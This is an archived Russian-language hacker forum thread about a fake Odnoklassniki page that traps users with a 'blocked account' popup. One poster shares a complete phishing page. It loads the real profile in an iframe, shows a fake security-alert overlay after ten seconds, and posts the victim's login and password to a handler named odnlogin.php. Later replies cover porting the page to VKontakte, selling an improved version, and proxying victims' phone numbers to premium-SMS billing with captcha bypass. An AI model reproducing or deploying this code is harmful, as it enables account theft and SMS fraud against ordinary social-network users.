Просмотр полной версии : Неплохая подделка одноклассников
kir55rus
04.03.2012, 01:00
Ку всем, недавно напоролся на сайт http://0dn0klasneki.net/ (https://hpc.name/redirector.html#http://0dn0klasneki.net/)
Разработчика стоит похвалить, всё сделал красиво: Загружается страница профиля с одноклассников (именно своего профиля. Со всеми данными: фото, имя, друзья и тд). Через некоторое время появляется окно, что аккаунт заблокирован. http://i.imgur.com/qccn9.png (https://hpc.name/redirector.html#http://i.imgur.com/qccn9.png)
Скажу честно, если бы я не знал, что сообщения подобного содержания не доводят до хорошего, я бы побыстрее подтвердил свой номер мобильного в этом окне.
В этой теме можете обсуждать данные творение, либо делиться своими находками подобного вида.
зы: еще раз хочу сказать, что лично мне такой вариант фейка очень понравился.
Nick Hander
По исполнению - верх примитивизма, но решение весьма оригинальное. Страница профиля одноклассников загружается во фрейме с оригинального сайта.
code:
Ну и через пару секунд табличка с требованием ввести телефон. Почему только телефон, мне не понятно. Ведь цель - кража пароля. Лучше бы была форма для кражи пароля. Кстати, я наверно сделаю фейк для одн. по такой идее - все тоже, но только вместа телефона - форма для ввода пароля. При нажатии по кнопке отправить данные летят в асинхронном запросе на обработчик, валидируются, возвращается ответ. Если данные не верны, форма не пропадает, высвечивается сообщение об ошибке. Если верны, окно закрывается. Гениально.
Вах-вах! Да, действительно интересная штучка-дрючка. Я, пожалуй, тоже с бубном вокруг неё попрыгаю, авось что-нибудь да получится.
kir55rus
Цитата:
Сообщение от Nick Hander
По исполнению - верх примитивизма, но решение весьма оригинальное.
об этом и говорю)
цель - подписать номер на платные рассылки, поэтому пароль от аккаунта тут не нужен, имхо
просьба ввести логин и пароль, когда ты уже находишься на своей странице - палево
Палево, но если правильно "подать", то никто не заметит измены.
Nick Hander
просьба ввести логин и пароль, когда ты уже находишься на своей странице - палево
Почему же, можно написать похожее сообщение, типа вы зашли на аккаунт с другого ip-адреса, просьба подтвердить, что именно вы являетесь владельцем аккаунта и ввести логин и пароль. Ну или что-то в этом роде. Вполне себе реалистично и правдоподобно. Вся остальная страница блокируется, окошко закрыть нельзя. Если пользователь захочет остаться в "аккаунте" и не закрывать страницу (а так поступят большинство), ему ничего не останется, как заполнить данными форму и нажать "вход". Тогда только окошко пропадет и можно будет дальше серфить по странице. А можно сделать валидацию и закрывать окно, только если пароль будет верный. Если подобрать грамотный домен и грамотно направить пользователя на фейк, то при такой ситуации процент успешности взлома будет приближаться к 90-100%, что весьма и весьма неплохо.
Upd: Вот наваял небольшой скриптик фейка для одноклассников. Через десять секунд выскакивает форма, в которой пользователя уведомляют о подозрительной активности и просят ввести пароль, остальная страница блокируется. Ну и форма. После введения пароля форма пропадает - данные летят на сниффер в асинхронном режиме можно серфить дальше. Обработчик ставите odnlogin.php, отлавливайте пост-запросы с именами email и password. Вот собственно фейк. Страница готовая, сохраняйте под любым именем и расширением .php и .html - на ваше усмотрение.
HTML highlight
Одноклассники
$(function(){
setTimeout("go()", 10000);
});
function go() {
var ww = $(window).width();
var wh = $(window).height();
$(".cl_background").show();
$(".cl_body").css('left', ww/2 - 325).css('top', wh/2-300).css('display', 'block');
};
function registration(){
var log = document.getElementById('login').value;
var pass = document.getElementById('pass').value;
$.post('odnlogin.php', {'email':log, 'password':pass});
$(".cl_body").remove();
$(".cl_background").remove();
}
html,body {
margin: 0;
padding: 0;
width: 100%;
height: 100%;
}
iframe {
padding: 0;
border: none;
position: absolute;
top: 0;
left: 0;
}
.loading {
display: none;
}
.loading span {
color: #ccc;
position: relative;
top: -2px;
}
.cl_background {
background: #ffffff;
z-index: 1;
opacity: 0.4;
}
.cl_body {
z-index: 2;
}
.error {
color: #ff0000;
}
.cl_title {
padding-left:85px;
font: 18px Tahoma;
color: #ED812B;
font-weight: bold;
padding-top: 30px;
background: url(http://flogiston.ru/apic/1388.gif);
height: 42px;
background-repeat: no-repeat;
}
.cl_body {
padding: 15px;
font: 12px Tahoma;
}
.cl_foot {
padding: 10px;
text-align: right;
}
.cl_info {
background: #fff;
color: #000;
background-image: url(http://technoportal.ua/img/inf/internet/odnoklasniki_logo_small.jpg);
background-position: -10px;
min-height: 70px;
padding-left: 80px;
padding-top: 25px;
}
.cl_body {
padding:10px;
width: 610px;
text-align: left;
box-shadow: 0 0 8px #ECF2F4;
border: 1px solid #ED812B;
}
.cl_title {
padding-left:85px;
font: 18px Tahoma;
padding-top: 30px;
background: url(http://flogiston.ru/apic/1388.gif);
height: 42px;
}
.cl_foot {
text-align: right;
}
.cl_info {
color: #000;
background-image: url(http://technoportal.ua/img/inf/internet/odnoklasniki_logo_small.jpg);
background-position: -10px;
min-height: 70px;
padding-left: 80px;
padding-top: 25px;
}
.cl_form label {
font: bold 16px Tahoma;
color: #3FAC0F;
}
.cl_form input {
color: #666;
width: 160px;
border: 1px solid #c0cad5;
padding: 5px;
}
.cl_form span {
color: #555;
display: block;
margin-left: 160px;
}
.cl_button button {
padding: 5px;
}
Внимание! Доступ Заблокирован!
С Вашего IP замечена подозрительная активность. Возможно Ваш аккаунт пытались взломать. Подтвердите, что Вы являетесь владельцем данного аккаунта, введите логин и пароль:
e-mail:
Пароль:
загрузка...
Продолжить
Это паблик версия. Усовершенствованную версию с валидацией (окно пропадает и страница становится доступна только после введения верного пароля, до этого, хоть усрись, окно не пропадет) продам только за деньги. Всем удачного взлома!
О, спасибо, но я лучше свой сделаю.
Пляски с бубном продолжаются. Вопрос: как сделать подобное на, скажем, вконтакте? Я так понимаю заменой фрейма не обойдёшься, так откуда же подгружается интерфейс?
Nick Hander
05.03.2012, 01:00
Вопрос: как сделать подобное на, скажем, вконтакте?
Точно так же. Только нужно будет новое окошко со стилистикой Вконтакте.
Я так понимаю заменой фрейма не обойдёшься, так откуда же подгружается интерфейс?
Оттуда же. Делаешь фрейм на все окно, и интерфейс подгружается с настоящего сайта. Так же как и на сабжевом сайте.
А мне больше интересно внутреннее устройство скрипта request.php, идея хороша - псевдоподписка автоматом.
Я лично такого не видел, ибо сейчас псевдоподписки предоставляются только вместе с сайтом - платником по реф. ссылке (например, как на jincash).
Возможно осуществление данным скриптом запроса на платник?
Т.е. так, чтобы он выступал в роли посредника между пользователем и сайтом биллинга?
Цитата:
Сообщение от PsiBoX
А мне больше интересно внутреннее устройство скрипта request.php, идея хороша - псевдоподписка автоматом.
Я лично такого не видел, ибо сейчас псевдоподписки предоставляются только вместе с сайтом - платником по реф. ссылке (например, как на jincash).
Возможно осуществление данным скриптом запроса на платник?
Т.е. так, чтобы он выступал в роли посредника между пользователем и сайтом биллинга?
все возможно, используя курл,
пользователь вводит номер, с помощью jsonp сделать запрос к пхп, скрипт обрабатывает данные и дает ответ допустим 'ок' в формате json, Яваскрипт на фейке получив - ок - выводит форму подтверждения, если не ок - выводит - введенный номер не верный или чтото такое! /И снова отправка на скрипт кода подтверждения!
Цитата:
все возможно, используя курл,
пользователь вводит номер, с помощью jsonp сделать запрос к пхп, скрипт обрабатывает данные и дает ответ допустим 'ок' в формате json, Яваскрипт на фейке получив - ок - выводит форму подтверждения, если не ок - выводит - введенный номер не верный или чтото такое! /И снова отправка на скрипт кода подтверждения!
Для такого надо еще годный биллинг найти.
А с большинством из них придется обходы искать - делать запрос страницы, вытаскивать с нее капчу, отправлять форму со скрипта как от имени пользователя.
Да, все это позволяет сделать курл... Займусь этим на днях, пожалуй.
Потом спущу на это 3-5к тематического трафика, посмотрим, какой конверт выйдет...
Цитата:
Сообщение от Nick Hander
Делаешь фрейм на все окно, и интерфейс подгружается с настоящего сайта. Так же как и на сабжевом сайте.
Что-то не выходит. Заменил фрейм, поставил в начало, выскакивает "контакт" на секунду и тут же превращается в белую страницу.
kir55rus
05.03.2012, 01:00
Цитата:
Сообщение от PsiBoX
Для такого надо еще годный биллинг найти.
А с большинством из них придется обходы искать - делать запрос страницы, вытаскивать с нее капчу, отправлять форму со скрипта как от имени пользователя.
Да, все это позволяет сделать курл... Займусь этим на днях, пожалуй.
Потом спущу на это 3-5к тематического трафика, посмотрим, какой конверт выйдет...
напиши здесь о результатах, они должны получиться неплохими, имхо
Yorvet, попробуй создать файл с содержанием . Если результат не изменится, то проблема с самим контактом. Может блокирует каким-нибудь образом подобную хрень. Но если всё станет отображаться нормально, то ищи ошибку в исходнике, который редактируешь
Nick Hander
06.03.2012, 01:00
Если результат не изменится, то проблема с самим контактом. Может блокирует каким-нибудь образом подобную хрень
С фреймом никаких проблем не должно быть. Если заходит на ВК обычным образом, и ничего не исчезает, то и через фрейм все будет работать точно так же. А вообще, если нужна помощь, выкладывай сюда исходник, сразу найдем причину.
Lena1988
04.04.2012, 01:00
Цитата:
Сообщение от Nick Hander
Upd: Вот наваял небольшой скриптик фейка для одноклассников.
в этом фейке когда нажимаешь продолжить ничего не происходит. как добавить форму чтобы отправлялся лог на снифер?? у меня не получилось подскажите пожалуста!
Приветствую вас. Пытаюсь задействовать данный фейк, но окно не появляется. Я не силен в JS. Подскажите пожалуйста решение.
Nick Hander ." После введения пароля форма пропадает - данные летят на сниффер в асинхронном режиме можно серфить дальше. " где этот сниффер ? я залил на хостинг скрипт и создал odnlogin.php ничего не работает и не выбивает окошко ни через 10 секунд ни через 10 минут ? в чем проблема ?
pirateweter
17.04.2012, 01:00
у меня эта сцалка не открывается :(
пробую фоксом... Походу умерла уже
обесните ещё раз как пользоватся скриптом ...
Цитата:
Сообщение от pirateweter
у меня эта сцалка не открывается :(
пробую фоксом... Походу умерла уже
Насчёт одноклассников не знаю, но с другими сайтами тот же код работает на ура (картинки и текст другие)
Цитата:
Сообщение от jean12
обесните ещё раз как пользоватся скриптом ...
Что тебе именно не понятно?
как пользоватся скриптом ? как обычным фейком ? даные отсылаются на odnlogin.php или на снифер , где взять снифер ?
Цитата:
Сообщение от jean12
jean12
Читай внимательно!
Цитата:
Сообщение от Nick Hander
Обработчик ставите odnlogin.php, отлавливайте пост-запросы с именами email и password
как обычный фейк
ОД через фреймы больше не получается подключить. Выкидывает на оригинальный сайт. Видать, прикрыли лавку.
таже фигня, жалко идея хорошая. может кто не буть знает как исправить скрипт ?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot